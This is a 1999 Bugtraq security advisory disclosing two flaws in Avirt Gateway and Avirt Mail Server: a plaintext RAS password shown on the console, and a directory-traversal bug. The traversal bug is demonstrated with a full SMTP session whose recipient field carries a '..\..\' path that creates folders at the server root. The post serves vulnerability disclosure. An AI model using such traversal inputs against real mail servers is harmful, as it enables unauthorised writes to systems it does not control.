[12425] in bugtraq
Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Jes=FAs_L=F3pez_de_)
Wed Nov 3 16:36:55 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-Id: <00bc01bf2544$b50cc4e0$0100a8c0@eunate.net>
Date: Tue, 2 Nov 1999 16:12:41 +0100
Reply-To: =?iso-8859-1?Q?Jes=FAs_L=F3pez_de_Aguileta?= <aguileta@EUNATE.NET>
From: =?iso-8859-1?Q?Jes=FAs_L=F3pez_de_Aguileta?= <aguileta@EUNATE.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
----- Original Message -----
From: Luciano Martins <luck@USSRBACK.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, November 01, 1999 9:57 AM
Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
vulnerability
> Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
> vulnerability
I post another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and
3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to
translate this message here.
1) Anybody with console access could retrieve RAS password in Avirt Gateway.
Changing the username in "Internet connection" properties and pressing
"test" button makes Avirt to present a message box with the password in
plaintext.
2) Anybody on the Intranet could make directories anywhere in the NT running
Avirt Mail Server.
telnet 192.168.0.1 25
> 220 server aVirt Mail SMTP Server Ready.
mail from:foo
> 250 foo, Sender OK
rcpt to:..\..\..\..\newfolder
> 250 ..\..\..\..\newfolder, Receipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
Textinside
.
> 250 Mail accepted.
This will create a root folder named "newfolder" with a file inside it.
Fortunately it appears to be impossible to overwrite an existing directory.
Avirt has been notified about this security flaws on 23/8/99
Regards
Jeszs Lspez de Aguileta
EunateNet
